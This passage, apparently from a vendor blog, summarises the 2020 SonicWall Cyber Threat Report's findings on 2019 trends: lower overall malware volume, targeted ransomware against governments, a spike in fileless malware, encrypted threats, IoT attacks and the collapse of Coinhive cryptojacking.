And part of that dedication starts with the 2020 SonicWall Cyber Threat Report, which provides critical threat intelligence to help you better understand how cybercriminals think — and be fully prepared for what they’ll do next.
Global Malware Dips, But More Targeted
For the last five years, cybercriminals overwhelmed organizations with sheer volume. But as cyber defenses evolved, more volume was not resulting in higher paydays. A change was in order.
In 2018, cybercriminals began to leverage more evasive and pointed attacks against “softer” targets. In 2019, global malware volume dipped, but attacks were more targeted with higher degrees of success, particularly against the healthcare industry, and state, provincial and local governments.
All told, SonicWall Capture Labs threat researchers recorded 9.9 billion malware attacks* in 2019 — a slight 6% year-over-year decrease.
Ransomware targets state, provincial and local governments
‘Spray and pray’ is over. Cybercriminals are using ransomware to surgically target victims that are more likely to pay given the sensitive data they possess or funds at their disposal (or both). Now it’s all about ‘big-game hunting.’
The report outlines the most egregious ransomware attacks of 2019, while also painting a picture of the evolution of ransomware families and signatures, including Cerber, GandCrab, HiddenTear and more.
Fileless malware spikes in Q3
Fileless malware is a type of malicious software that exists exclusively as a memory-based artifact (i.e., RAM). It does not write any part of its activity to the computer’s hard drive, making it very resistant to existing computer forensic strategies.
The use of fileless malware ebbed and flowed in 2019. But exclusive SonicWall data shows a massive mid-year spike for this savvy technique.
Encrypted threats growing consistently
Another year, another jump in the use of encrypted threats. Until more organizations proactively and responsibly inspect TLS/SSL traffic, this attack vector will only expand.
IoT malware volume rising
From hacked doorbell cameras to rogue nanny cams, 2019 was an alarming year for the security and privacy of IoT devices. Trending data suggests more IoT-based attacks are on the horizon.
Cryptojacking crumbles
In early 2019, the price of bitcoin and complementary cryptocurrencies created an untenable situation between Coinhive-based cryptojacking malware and the legitimate Coinhive mining service. The shuttering of the latter led to the virtual disappearance of one the year’s hottest malware.
